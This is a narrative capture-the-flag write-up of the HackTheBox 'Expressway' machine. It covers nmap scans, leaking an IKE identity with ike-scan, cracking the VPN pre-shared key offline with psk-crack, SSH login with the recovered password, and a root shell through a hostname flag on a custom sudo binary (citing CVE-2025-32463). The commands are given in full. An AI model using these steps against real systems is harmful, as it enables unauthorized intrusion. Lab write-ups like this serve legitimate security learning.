Expressway Machine | HackTheBox

Expressway Machine | HackTheBox

Once upon a late-night session in the cyber underground, I stumbled across a fresh “Expressway” box on HackTheBox — a promised route to digital mastery and a cautionary tale of misconfigured VPN gateways and homemade privilege escalation tools. Like a true cyber-detective, I geared up, eager for something deeper than just artifact hunting. This wasn’t just about flags — it was about learning.


Chapter 1: Recon — Listening for Opportunity

The Opening Scene

Imagine the network as a vast, silent street—shrouded in shadows. My first step: turn on the headlights and see what’s out there.

TCP Scan — First Pass, False Comfort

nmap -p- -T4 -sS 10.10.11.87 -oN initial_tcp_scan.txt

SSH (port 22) greets me and then slams the door in my face. No welcome mat here. The box seems as silent as a ghost. Seasoned hackers know—if you only look for doors, you might miss the windows.

The UDP Angle — Where All the Clues Hide

sudo nmap -sU 10.10.11.87 --min-rate 5000

Port 500 lights up. IPsec/IKE. VPN land: hostile territory for most, but a playground for those who know the rules.


Chapter 2: The VPN Enigma

Aggressive Negotiations

IKE is like the bouncer at the Expressway nightclub—it checks IDs and sometimes lets a little info slip during “aggressive mode.” I deploy the toolkit:

sudo apt install ike-scan
sudo ike-scan -A 10.10.11.87

"Aggressive Mode" leaks something precious — a user ID: ike@expressway.htb. In this city, names are keys.

Cracking the Vault — Snatching the Pre-Shared Key

I provoke the handshake to spill its hashed secrets:

sudo ike-scan -A 10.10.11.87 --id=ike@expressway.htb -Pike.psk

The file ike.psk contains the hashed PSK. I bring in heavy artillery: psk-crack.

psk-crack -d /usr/share/wordlists/rockyou.txt ike.psk

And in the wordlist, in classic CTF fashion, the passphrase freakingrockstarontheroad emerges. Weak credentials — the box builder’s favorite lesson. Never reuse your club’s master key as your personal password.


Chapter 3: First Foothold — The Human Touch

SSH: No Brute Force Needed

ssh ike@10.10.11.87
# Password: freakingrockstarontheroad

Success — the terminal blinks and I'm on! This is the first flag checkpoint, but the true journey is deeper.

cat ~/user.txt

What’s next? Enumeration — never trust surface impressions.

Group Therapy: The Proxy Connection

id
# Output: uid=1000(ike) gid=1000(ike) groups=1000(ike),998(proxy)

proxy? Time to investigate. Every group on Linux has a story.


Chapter 4: Squid Games — Secrets in the Logs

Through the foggy proxy glass, valuable traces appear:

ls -lh /var/log/squid/
cat /var/log/squid/access.log | grep DENIED

A denied request references offramp.expressway.htb — an internal hostname. That oddity will soon become crucial.


Chapter 5: Sudo — The Trojan Command

A Sudo Like No Other

Find the imposter:

which sudo
ls -lh /usr/local/bin/sudo

A custom sudo, tentatively setuid-root, oversized (1MB+). Never trust a custom lock without testing its mechanism.

sudo -l

The output reveals a hostname-based policy. Suspicious? Yes. Exploitable? Always check!

Crafting the ByPass — When Policy Goes Awry

Remember that internal hostname? Here's how to break in:

/usr/local/bin/sudo -h offramp.expressway.htb /bin/bash

A root shell. All the alarms go silent — when a hostname check forgets who the real boss is. In real life, always audit custom binaries and their policies.

Claiming the Spoils

cat /root/root.txt

The digital trophy — a flag is more than text. It’s a marker of your journey, your learning, your storytelling.


Epilogue: Lessons from the Expressway

  • Aggressive Mode in IKE: Easily leaks user IDs, allows offline dictionary attacks. Real-life tip: always disable aggressive mode on VPNs and use strong PSKs.

  • Password Reuse: If your PSK doubles as your user password, you might as well hand attackers the keys. Rotate and randomize credentials!

  • Custom Sudo Policies: Flawed logic in binaries handling hostname, groups, or chroots can turn privilege separation into a suggestion — not a rule.

  • Log Files as Intel: Proxy logs, denied requests, and internal hostnames often reveal attack paths hidden from standard enumeration.

  • Latest Vulnerabilities Matter: Staying informed about releases like CVE-2025-32463 empowers you to pivot quickly if patching is incomplete.


Final Thoughts

The “Expressway” revealed the junction between classic protocol weakness and modern privilege escalation. Each step cracked open a lesson: enumerate everything, question every binary, and find joy not just in the exploit, but in the understanding.

Read more